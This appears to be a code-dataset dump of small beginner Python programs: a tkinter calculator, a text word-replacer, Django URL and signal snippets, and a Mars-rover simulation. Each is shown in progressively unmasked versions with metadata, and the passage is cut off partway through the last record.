<|reserved_special_token_1|>
<|reserved_special_token_0|>
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
def button_mul():
global first_num
global math
math = 'multiplication'
first_num = e.get()
e.delete(0, END)
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
<|reserved_special_token_0|>
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = 'addition'
first_num = e.get()
e.delete(0, END)
def button_mul():
global first_num
global math
math = 'multiplication'
first_num = e.get()
e.delete(0, END)
def button_sub():
global first_num
global math
math = 'subtraction'
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = 'division'
first_num = e.get()
e.delete(0, END)
def button_equal():
sec_num = e.get()
e.delete(0, END)
if math == 'addition':
e.insert(0, int(first_num) + int(sec_num))
if math == 'multiplication':
e.insert(0, int(first_num) * int(sec_num))
if math == 'subtraction':
e.insert(0, int(first_num) - int(sec_num))
if math == 'division':
e.insert(0, int(first_num) / int(sec_num))
def clear():
e.delete(0, END)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from tkinter import *
root = Tk()
root.title("Calculator")
e = Entry(root, width = 50, borderwidth = 5)
e.grid(row = 0, column = 0, columnspan = 4, padx = 10, pady = 20)
def button_click(number):
digit = e.get()
e.delete(0, END)
e.insert(0, str(digit) + str(number))
def button_add():
global first_num
global math
math = "addition"
first_num = e.get()
e.delete(0, END)
def button_mul():
global first_num
global math
math = "multiplication"
first_num = e.get()
e.delete(0, END)
def button_sub():
global first_num
global math
math = "subtraction"
first_num = e.get()
e.delete(0, END)
def button_div():
global first_num
global math
math = "division"
first_num = e.get()
e.delete(0, END)
def button_equal():
sec_num = e.get()
e.delete(0, END)
if math == "addition":
e.insert(0, int(first_num) + int(sec_num))
if math == "multiplication":
e.insert(0, int(first_num) * int(sec_num))
if math == "subtraction":
e.insert(0, int(first_num) - int(sec_num))
if math == "division":
e.insert(0, int(first_num) / int(sec_num))
def clear():
e.delete(0, END)
#creating buttons
button_1 = Button(root, text = "1", height = 5, width = 10,command = lambda:button_click(1))
button_2 = Button(root, text = "2", height = 5, width = 10, command = lambda:button_click(2))
button_3 = Button(root, text = "3", height = 5, width = 10, command = lambda:button_click(3))
button_4 = Button(root, text = "4", height = 5, width = 10, command = lambda:button_click(4))
button_5 = Button(root, text = "5", height = 5, width = 10, command = lambda:button_click(5))
button_6 = Button(root, text = "6", height = 5, width = 10, command = lambda:button_click(6))
button_7 = Button(root, text = "7", height = 5, width = 10, command = lambda:button_click(7))
button_8 = Button(root, text = "8", height = 5, width = 10, command = lambda:button_click(8))
button_9 = Button(root, text = "9", height = 5, width = 10, command = lambda:button_click(9))
button_0 = Button(root, text = "0", height = 5, width = 10, command = lambda:button_click(0))
button_add = Button(root, text = "+", height = 5, width = 10, bg = "#A1CAE2", command = button_add)
button_mul = Button(root, text = "*", height = 5, width = 10, bg = "#A1CAE2", command = button_mul)
button_sub = Button(root, text = "-", height = 5, width = 10, bg = "#A1CAE2", command = button_sub)
button_div = Button(root, text = "/", height = 5, width = 10, bg = "#A1CAE2", command = button_div)
button_equal = Button(root, text = "=", height = 5, width = 10, bg = "#A1CAE2", command = button_equal)
button_clear = Button(root, text = "Clear", height = 5, width = 10, bg = "#A1CAE2", command = clear)
#placing buttons
button_1.grid(row = 3, column = 0)
button_2.grid(row = 3, column = 1)
button_3.grid(row = 3, column = 2)
button_4.grid(row = 2, column = 0)
button_5.grid(row = 2, column = 1)
button_6.grid(row = 2, column = 2)
button_7.grid(row = 1, column = 0)
button_8.grid(row = 1, column = 1)
button_9.grid(row = 1, column = 2)
button_0.grid(row = 4, column = 0)
button_add.grid(row = 4, column = 1)
button_sub.grid(row = 1, column = 4)
button_mul.grid(row = 2, column = 4)
button_div.grid(row = 3, column = 4)
button_equal.grid(row = 4, column = 2)
button_clear.grid(row = 4, column = 4)
root.mainloop()
|
flexible
|
{
"blob_id": "59a75f78c7a146dcf55d43be90f71abce2bcf753",
"index": 4934,
"step-1": "<mask token>\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef button_click(number):\n digit = e.get()\n e.delete(0, END)\n e.insert(0, str(digit) + str(number))\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef button_click(number):\n digit = e.get()\n e.delete(0, END)\n e.insert(0, str(digit) + str(number))\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_mul():\n global first_num\n global math\n math = 'multiplication'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\n<mask token>\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef button_click(number):\n digit = e.get()\n e.delete(0, END)\n e.insert(0, str(digit) + str(number))\n\n\ndef button_add():\n global first_num\n global math\n math = 'addition'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_mul():\n global first_num\n global math\n math = 'multiplication'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_sub():\n global first_num\n global math\n math = 'subtraction'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_div():\n global first_num\n global math\n math = 'division'\n first_num = e.get()\n e.delete(0, END)\n\n\ndef button_equal():\n sec_num = e.get()\n e.delete(0, END)\n if math == 'addition':\n e.insert(0, int(first_num) + int(sec_num))\n if math == 'multiplication':\n e.insert(0, int(first_num) * int(sec_num))\n if math == 'subtraction':\n e.insert(0, int(first_num) - int(sec_num))\n if math == 'division':\n e.insert(0, int(first_num) / int(sec_num))\n\n\ndef clear():\n e.delete(0, END)\n\n\n<mask token>\n",
"step-5": "from tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Calculator\")\r\n\r\ne = Entry(root, width = 50, borderwidth = 5)\r\ne.grid(row = 0, column = 0, columnspan = 4, padx = 10, pady = 20)\r\n\r\ndef button_click(number):\r\n\tdigit = e.get()\r\n\te.delete(0, END)\r\n\te.insert(0, str(digit) + str(number))\r\n\r\ndef button_add():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"addition\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_mul():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"multiplication\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_sub():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"subtraction\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_div():\r\n\tglobal first_num\r\n\tglobal math\r\n\tmath = \"division\"\r\n\tfirst_num = e.get()\r\n\te.delete(0, END)\r\n\r\ndef button_equal():\t\r\n\tsec_num = e.get()\r\n\te.delete(0, END)\r\n\tif math == \"addition\":\r\n\t\te.insert(0, int(first_num) + int(sec_num))\r\n\tif math == \"multiplication\":\r\n\t\te.insert(0, int(first_num) * int(sec_num))\r\n\tif math == \"subtraction\":\r\n\t\te.insert(0, int(first_num) - int(sec_num))\r\n\tif math == \"division\":\r\n\t\te.insert(0, int(first_num) / int(sec_num))\r\n\r\ndef clear():\r\n\te.delete(0, END)\r\n\r\n\t\r\n#creating buttons\r\nbutton_1 = Button(root, text = \"1\", height = 5, width = 10,command = lambda:button_click(1))\r\nbutton_2 = Button(root, text = \"2\", height = 5, width = 10, command = lambda:button_click(2))\r\nbutton_3 = Button(root, text = \"3\", height = 5, width = 10, command = lambda:button_click(3))\r\nbutton_4 = Button(root, text = \"4\", height = 5, width = 10, command = lambda:button_click(4))\r\nbutton_5 = Button(root, text = \"5\", height = 5, width = 10, command = lambda:button_click(5))\r\nbutton_6 = Button(root, text = \"6\", height = 5, width = 10, command = lambda:button_click(6))\r\nbutton_7 = Button(root, text = \"7\", height = 5, 
width = 10, command = lambda:button_click(7))\r\nbutton_8 = Button(root, text = \"8\", height = 5, width = 10, command = lambda:button_click(8))\r\nbutton_9 = Button(root, text = \"9\", height = 5, width = 10, command = lambda:button_click(9))\r\nbutton_0 = Button(root, text = \"0\", height = 5, width = 10, command = lambda:button_click(0))\r\n\r\nbutton_add = Button(root, text = \"+\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_add)\r\nbutton_mul = Button(root, text = \"*\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_mul)\r\nbutton_sub = Button(root, text = \"-\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_sub)\r\nbutton_div = Button(root, text = \"/\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_div)\r\nbutton_equal = Button(root, text = \"=\", height = 5, width = 10, bg = \"#A1CAE2\", command = button_equal)\r\nbutton_clear = Button(root, text = \"Clear\", height = 5, width = 10, bg = \"#A1CAE2\", command = clear)\r\n\r\n#placing buttons\r\nbutton_1.grid(row = 3, column = 0)\r\nbutton_2.grid(row = 3, column = 1)\r\nbutton_3.grid(row = 3, column = 2)\r\nbutton_4.grid(row = 2, column = 0)\r\nbutton_5.grid(row = 2, column = 1)\r\nbutton_6.grid(row = 2, column = 2)\r\nbutton_7.grid(row = 1, column = 0)\r\nbutton_8.grid(row = 1, column = 1)\r\nbutton_9.grid(row = 1, column = 2)\r\nbutton_0.grid(row = 4, column = 0)\r\n\r\nbutton_add.grid(row = 4, column = 1)\r\nbutton_sub.grid(row = 1, column = 4)\r\nbutton_mul.grid(row = 2, column = 4)\r\nbutton_div.grid(row = 3, column = 4)\r\nbutton_equal.grid(row = 4, column = 2)\r\nbutton_clear.grid(row = 4, column = 4)\r\n\r\nroot.mainloop()",
"step-ids": [
4,
5,
6,
7,
11
]
}
|
[
4,
5,
6,
7,
11
] |
<|reserved_special_token_0|>
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fin = 'retext-in.txt'
fot = 'retext-out.txt'
t1 = """
here we go again and we know:
here we do the same
"""
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
main()
<|reserved_special_token_1|>
import re, random, sys
fin = 'retext-in.txt'
fot = 'retext-out.txt'
t1 = """
here we go again and we know:
here we do the same
"""
def redo(text: str, aword: str, subs: list) ->str:
""" заменятель """
return re.sub(f'(\\W){aword}(\\W)', '\\1' + random.choice(subs) + '\\2',
' ' + text + ' ').strip()
def test1():
""" тестировщик """
w = 'we'
s = ['they', 'he', 'she']
print(w, '->', s, '\n', t1, '\n', redo(t1, w, s))
def main():
""" запуск """
print('got params:', sys.argv)
argc = len(sys.argv)
if argc < 3:
print('Not enough parameters')
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print('text:', text)
print('out:', out)
with open(fot, 'w') as fo:
fo.write(out)
main()
<|reserved_special_token_1|>
# -- !/python3.10
# Mikhail (myke) Kolodin, 2021
# 2021-10-21 2021-10-21 1.2
# retext.py
# Заменить во входном тексте указанное слово на случайный вариант
# из предложенного набора заменителей.
# Параметры - в командной строке.
import re, random, sys
fin = 'retext-in.txt'
fot = 'retext-out.txt'
t1 = """
here we go again and we know:
here we do the same
"""
def redo(text: str, aword: str, subs: list) -> str:
""" заменятель """
return re.sub(f'(\W){aword}(\W)', r"\1"+random.choice(subs)+r"\2", " "+text+" ").strip()
def test1():
""" тестировщик """
w = "we"
s = ["they", "he", "she"]
print(w, "->", s, "\n", t1, "\n", redo(t1, w, s))
#test1()
def main():
""" запуск """
print("got params:", sys.argv)
argc = len(sys.argv)
if argc < 3:
print("Not enough parameters")
return
w, *subs = sys.argv[1:]
print(w, subs)
with open(fin) as fi:
text = fi.read()
out = redo(text, w, subs)
print("text:", text)
print("out:", out)
with open(fot, 'w') as fo:
fo.write(out)
main()
|
flexible
|
{
"blob_id": "d1a179acfda9e76a11f362671fafb50773e2b9d3",
"index": 9405,
"step-1": "<mask token>\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\nmain()\n",
"step-3": "<mask token>\nfin = 'retext-in.txt'\nfot = 'retext-out.txt'\nt1 = \"\"\"\nhere we go again and we know:\nhere we do the same\n\"\"\"\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\nmain()\n",
"step-4": "import re, random, sys\nfin = 'retext-in.txt'\nfot = 'retext-out.txt'\nt1 = \"\"\"\nhere we go again and we know:\nhere we do the same\n\"\"\"\n\n\ndef redo(text: str, aword: str, subs: list) ->str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\\\W){aword}(\\\\W)', '\\\\1' + random.choice(subs) + '\\\\2',\n ' ' + text + ' ').strip()\n\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = 'we'\n s = ['they', 'he', 'she']\n print(w, '->', s, '\\n', t1, '\\n', redo(t1, w, s))\n\n\ndef main():\n \"\"\" запуск \"\"\"\n print('got params:', sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print('Not enough parameters')\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print('text:', text)\n print('out:', out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\n\nmain()\n",
"step-5": "# -- !/python3.10\n\n# Mikhail (myke) Kolodin, 2021\n# 2021-10-21 2021-10-21 1.2\n# retext.py\n# Заменить во входном тексте указанное слово на случайный вариант\n# из предложенного набора заменителей.\n# Параметры - в командной строке.\n\nimport re, random, sys\n\nfin = 'retext-in.txt'\nfot = 'retext-out.txt'\n\nt1 = \"\"\"\nhere we go again and we know:\nhere we do the same\n\"\"\"\n\ndef redo(text: str, aword: str, subs: list) -> str:\n \"\"\" заменятель \"\"\"\n return re.sub(f'(\\W){aword}(\\W)', r\"\\1\"+random.choice(subs)+r\"\\2\", \" \"+text+\" \").strip()\n\ndef test1():\n \"\"\" тестировщик \"\"\"\n w = \"we\"\n s = [\"they\", \"he\", \"she\"]\n print(w, \"->\", s, \"\\n\", t1, \"\\n\", redo(t1, w, s))\n\n#test1()\n\ndef main():\n \"\"\" запуск \"\"\"\n print(\"got params:\", sys.argv)\n argc = len(sys.argv)\n if argc < 3:\n print(\"Not enough parameters\")\n return\n w, *subs = sys.argv[1:]\n print(w, subs)\n with open(fin) as fi:\n text = fi.read()\n out = redo(text, w, subs)\n print(\"text:\", text)\n print(\"out:\", out)\n with open(fot, 'w') as fo:\n fo.write(out)\n\nmain()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('', views.home, name='home'), path('category/', include
('api.category.urls')), path('product/', include('api.product.urls')),
path('user/', include('api.user.urls')), path('order/', include(
'api.order.urls')), path('payment/', include('api.payment.urls'))]
<|reserved_special_token_1|>
from django.urls import path, include
from . import views
urlpatterns = [path('', views.home, name='home'), path('category/', include
('api.category.urls')), path('product/', include('api.product.urls')),
path('user/', include('api.user.urls')), path('order/', include(
'api.order.urls')), path('payment/', include('api.payment.urls'))]
<|reserved_special_token_1|>
from django.urls import path,include
from .import views
urlpatterns = [
path('',views.home,name='home'),
path('category/',include('api.category.urls')),
path('product/',include('api.product.urls')),
path('user/',include('api.user.urls')),
path('order/',include('api.order.urls')),
path('payment/',include('api.payment.urls')),
]
|
flexible
|
{
"blob_id": "fe12f6d3408ab115c5c440c5b45a9014cfee6539",
"index": 564,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', views.home, name='home'), path('category/', include\n ('api.category.urls')), path('product/', include('api.product.urls')),\n path('user/', include('api.user.urls')), path('order/', include(\n 'api.order.urls')), path('payment/', include('api.payment.urls'))]\n",
"step-3": "from django.urls import path, include\nfrom . import views\nurlpatterns = [path('', views.home, name='home'), path('category/', include\n ('api.category.urls')), path('product/', include('api.product.urls')),\n path('user/', include('api.user.urls')), path('order/', include(\n 'api.order.urls')), path('payment/', include('api.payment.urls'))]\n",
"step-4": "from django.urls import path,include\nfrom .import views\n\nurlpatterns = [\n path('',views.home,name='home'),\n path('category/',include('api.category.urls')),\n path('product/',include('api.product.urls')),\n path('user/',include('api.user.urls')),\n path('order/',include('api.order.urls')),\n path('payment/',include('api.payment.urls')),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
staff = ['инженер-конструктор Игорь', 'главный бухгалтер МАРИНА',
'токарь высшего разряда нИКОЛАй', 'директор аэлита']
def employee_name(name):
getting_a_name = name.split()
name_staff = getting_a_name[-1]
name_staff = name_staff.capitalize()
return name_staff
i = 0
while i < len(staff):
name_for_output = employee_name(staff[i])
print(f'Привет, {name_for_output}!')
i += 1
|
normal
|
{
"blob_id": "4c4275b96d3eceb5ff89a746c68d7f8736a1c2a5",
"index": 8561,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef employee_name(name):\n getting_a_name = name.split()\n name_staff = getting_a_name[-1]\n name_staff = name_staff.capitalize()\n return name_staff\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef employee_name(name):\n getting_a_name = name.split()\n name_staff = getting_a_name[-1]\n name_staff = name_staff.capitalize()\n return name_staff\n\n\n<mask token>\nwhile i < len(staff):\n name_for_output = employee_name(staff[i])\n print(f'Привет, {name_for_output}!')\n i += 1\n",
"step-4": "staff = ['инженер-конструктор Игорь', 'главный бухгалтер МАРИНА',\n 'токарь высшего разряда нИКОЛАй', 'директор аэлита']\n\n\ndef employee_name(name):\n getting_a_name = name.split()\n name_staff = getting_a_name[-1]\n name_staff = name_staff.capitalize()\n return name_staff\n\n\ni = 0\nwhile i < len(staff):\n name_for_output = employee_name(staff[i])\n print(f'Привет, {name_for_output}!')\n i += 1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
property_viewed = django.dispatch.Signal(providing_args=['property', 'user',
'request', 'response'])
<|reserved_special_token_1|>
import django.dispatch
property_viewed = django.dispatch.Signal(providing_args=['property', 'user',
'request', 'response'])
<|reserved_special_token_1|>
import django.dispatch
property_viewed = django.dispatch.Signal(providing_args=["property","user", "request", "response"])
|
flexible
|
{
"blob_id": "00099cab0c816c76fc0fa94d7905175feb6919cf",
"index": 9795,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nproperty_viewed = django.dispatch.Signal(providing_args=['property', 'user',\n 'request', 'response'])\n",
"step-3": "import django.dispatch\nproperty_viewed = django.dispatch.Signal(providing_args=['property', 'user',\n 'request', 'response'])\n",
"step-4": "import django.dispatch\n\nproperty_viewed = django.dispatch.Signal(providing_args=[\"property\",\"user\", \"request\", \"response\"])",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class Rover(object):
DIRECTIONS = 'NESW'
MOVEMENTS = {
'N': (0, 1),
'E': (1, 0),
'S': (0, -1),
'W': (-1, 0)
}
def __init__(self, init_string, plateau_dimensions):
'''
give the rover a sense of the plateau it's on
'''
max_x, max_y = plateau_dimensions
self.max_x = int(max_x)
self.max_y = int(max_y)
'''
x = current x coordinate
y = current y coordinate
o = current orientation
'''
x, y, o = init_string.split(' ')
self.x = min(self.max_x, int(x))
self.y = min(self.max_y, int(y))
self.o = o
self.obstacles = {}
self.commands = ''
def __repr__(self):
return "<Rover x=%d, y=%d, o=%s>" % (self.x, self.y, self.o)
def get_position(self):
return self.x, self.y
def set_obstacles(self, locations):
for x, y in locations:
d = self.obstacles.setdefault(x, {})
d.setdefault(y, 'ROVER') # could be any value
def is_location_free(self, x, y):
column = self.obstacles.get(x)
if not column:
''' nothing in this column '''
return True
else:
row = column.get(y)
if not row:
return True
return False
def _rotate(self, direction):
i = self.DIRECTIONS.index(self.o)
i = i + direction
if i == len(self.DIRECTIONS):
self.o = self.DIRECTIONS[0]
elif i < 0:
self.o = self.DIRECTIONS[-1]
else:
self.o = self.DIRECTIONS[i]
def rotate_right(self):
self._rotate(1)
def rotate_left(self):
self._rotate(-1)
def move(self):
x, y = self.MOVEMENTS.get(self.o)
new_x = self.x + x
new_y = self.y + y
if (not 0 <= new_x <= self.max_x) or (not 0 <= new_y <= self.max_y):
''' ignore, out of bounds '''
pass
elif not self.is_location_free(new_x, new_y):
''' there is a rover in my way! '''
pass
else:
self.x += x
self.y += y
def set_commands(self, command_string):
self.commands = command_string
def execute(self):
for c in self.commands:
if c == 'L':
self.rotate_left()
elif c == 'R':
self.rotate_right()
elif c == 'M':
self.move()
else:
print 'unknown command: %s' % c
return "%d %d %s" % (self.x, self.y, self.o)
class ControlCenter(object):
def __init__(self):
self.input = ''
self.rovers = []
def set_input(self, text):
''' take the input, split by newline and discard empty lines '''
self.input = [line for line in text.split('\n') if line]
def clear_rovers(self):
self.rovers = []
def initialize_rover(self, initial_position, plateau_dimensions):
rover = Rover(initial_position, plateau_dimensions)
'''
Initialize a rover and add it to a list of rovers for reference.
'''
self.rovers.append(rover)
return rover
def run(self):
rover_states = []
''' First setup the rovers, and collect the control statements '''
for i, line in enumerate(self.input):
line = line.upper()
if i == 0:
plateau_dimensions = line.split(" ")
elif (i % 2) == 1:
rover = self.initialize_rover(line, plateau_dimensions)
else:
rover.set_commands(line)
'''
Now that we have all the rovers initialized, we can pass their current
positions to the one that's going to move in order to avoid collisions.
'''
for i, rover in enumerate(self.rovers):
obstacles = [r.get_position()
for r in self.rovers[:i] + self.rovers[i + 1:]]
rover.set_obstacles(obstacles)
state = rover.execute()
rover_states.append(state)
return "\n\n".join(rover_states)
if __name__ == "__main__":
from test_cases import tests
success = 0
cc = ControlCenter()
for i, (test_input, test_output) in enumerate(tests, start=1):
cc.clear_rovers()
cc.set_input(test_input)
if cc.run() == test_output:
success += 1
print '%d tests out of %d passed' % (success, i)
|
normal
|
{
"blob_id": "1f49d2341f0bcc712baede28f41c208a01b92e6d",
"index": 2998,
"step-1": "class Rover(object):\n\n DIRECTIONS = 'NESW'\n MOVEMENTS = {\n 'N': (0, 1),\n 'E': (1, 0),\n 'S': (0, -1),\n 'W': (-1, 0)\n }\n\n def __init__(self, init_string, plateau_dimensions):\n ''' \n give the rover a sense of the plateau it's on\n '''\n max_x, max_y = plateau_dimensions\n self.max_x = int(max_x)\n self.max_y = int(max_y)\n\n '''\n x = current x coordinate\n y = current y coordinate\n o = current orientation\n '''\n x, y, o = init_string.split(' ')\n self.x = min(self.max_x, int(x))\n self.y = min(self.max_y, int(y))\n self.o = o\n\n self.obstacles = {}\n self.commands = ''\n\n def __repr__(self):\n return \"<Rover x=%d, y=%d, o=%s>\" % (self.x, self.y, self.o)\n\n def get_position(self):\n return self.x, self.y\n\n def set_obstacles(self, locations):\n for x, y in locations:\n d = self.obstacles.setdefault(x, {})\n d.setdefault(y, 'ROVER') # could be any value\n\n def is_location_free(self, x, y):\n column = self.obstacles.get(x)\n if not column:\n ''' nothing in this column '''\n return True\n else:\n row = column.get(y)\n if not row:\n return True\n\n return False\n\n def _rotate(self, direction):\n i = self.DIRECTIONS.index(self.o)\n i = i + direction\n if i == len(self.DIRECTIONS):\n self.o = self.DIRECTIONS[0]\n elif i < 0:\n self.o = self.DIRECTIONS[-1]\n else:\n self.o = self.DIRECTIONS[i]\n\n def rotate_right(self):\n self._rotate(1)\n\n def rotate_left(self):\n self._rotate(-1)\n\n def move(self):\n x, y = self.MOVEMENTS.get(self.o)\n new_x = self.x + x\n new_y = self.y + y\n\n if (not 0 <= new_x <= self.max_x) or (not 0 <= new_y <= self.max_y):\n ''' ignore, out of bounds '''\n pass\n elif not self.is_location_free(new_x, new_y):\n ''' there is a rover in my way! 
